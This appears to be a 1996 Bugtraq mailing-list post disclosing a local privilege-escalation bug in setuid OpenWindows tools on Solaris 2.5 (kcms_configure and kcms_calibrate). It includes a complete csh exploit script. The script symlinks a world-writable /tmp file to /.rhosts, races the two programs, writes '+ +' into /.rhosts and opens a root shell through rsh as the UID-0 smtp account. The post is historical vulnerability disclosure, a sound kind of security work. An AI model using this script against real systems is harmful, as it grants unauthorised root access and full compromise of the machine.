[3008] in bugtraq
Zolaris 2.5 Exploited.
daemon@ATHENA.MIT.EDU (Jungseok Roh)
Thu Jul 25 17:29:09 1996
Date: Fri, 26 Jul 1996 04:37:10 -0900
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Jungseok Roh <beren@cosmos.kaist.ac.kr>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Wow.. I got a chance to use Ultra Sparc who runs Zolaris 2.5 several days ago ~
then ONe of my senior told me that there might be a Funny ,also UNCONCEIVABLE
bugs in Openwindows.. I trusted him...
and I traversed the file system under /usr/openwin ..
there were just four SUIDed files .. ( if Admin installed openwin packages )
xlock , ff.core , kcms* .. Problem made less vague
kcms_calibrate , kcms_configure is the objects we are approaching.
When examining the kcms families. I found a funny stuff .
kcms_configure makes the temporary(?) files in /tmp whoses permisson bit
is 666 ( Wow The sign of Devil ),, definately root owns it..
IT'S NAME is Kp_kcms_sys.sem !...
Then all u guys know the next procedure is .
hk.. I can't show u whole the procedure right now.
'Cause My Zolaris machine is "Network Unreachible ...".
One Odd thin's are Exploitation Succeeds when it interacts with kcms_calibrate!!
Major procedure is making the temporary files which linked to /.rhosts then
while kcms_configure tries to write /.rhosts make Thunder rolls using
kcms_calibrate and Make its power Powerful.. puha.. it's like seeing
Back To the Future III... then kcms_configure succeed its operation .
I made a simple script exploiting the machine who has that fatal bug.
hmm..but I can't erase one curiosity ..
Why Sun made this humble mistake ? ... plz someboy notify this bug to SUN.
I don't know Her E-mail Address .. :)
(what a simple!!) script follows .
this script shows u just PROCEDURE .. re-make on your demands .
cat > uhit.sh << E_O_F
#!/bin/csh
# JungSeok. Roh ( beren@cosmos.kaist.ac.kr )
# Junior in KAIST undergraduate. Under Management Dep .
set disp="cosmos.kaist.ac.kr:0.0"
setenv DISPLAY $disp
/bin/rm -rf /tmp/Kp_kcms_sys.sem
cd /tmp
#Making symbolic link
ln -s /.rhosts Kp_kcms_sys.sem
/usr/openwin/bin/kcms_calibrate &
while(1)
echo "Click the device you've chosen in kcms_calibrate window"
# Choose Any profiles .. hk..
# My 2.5 machine is unreachible son I can't get exact name of that profiles.
# What a fool I am.. jjap..
/usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/profiles/Eksony17.mon
if( -f /.rhosts ) then
echo -n "+ +" >> /.rhosts
# As u know , we can't login as root .. use smtp account. that has UID 0 !!
/usr/bin/rsh localhost -l smtp csh -i
endif
end
E_O_F
__
There was a Legendary Security Task Force team whose Name is K/U/S ..
But BLOWED up by KOREAN National Prosecutor.. I hate them !! .......
They make me so sad .... Laughin' in bitter tears ... hk..hk..
JungSeok Roh / Junior in KAIST / beren@cosmos.kaist.ac.kr / +82-42-869-5400
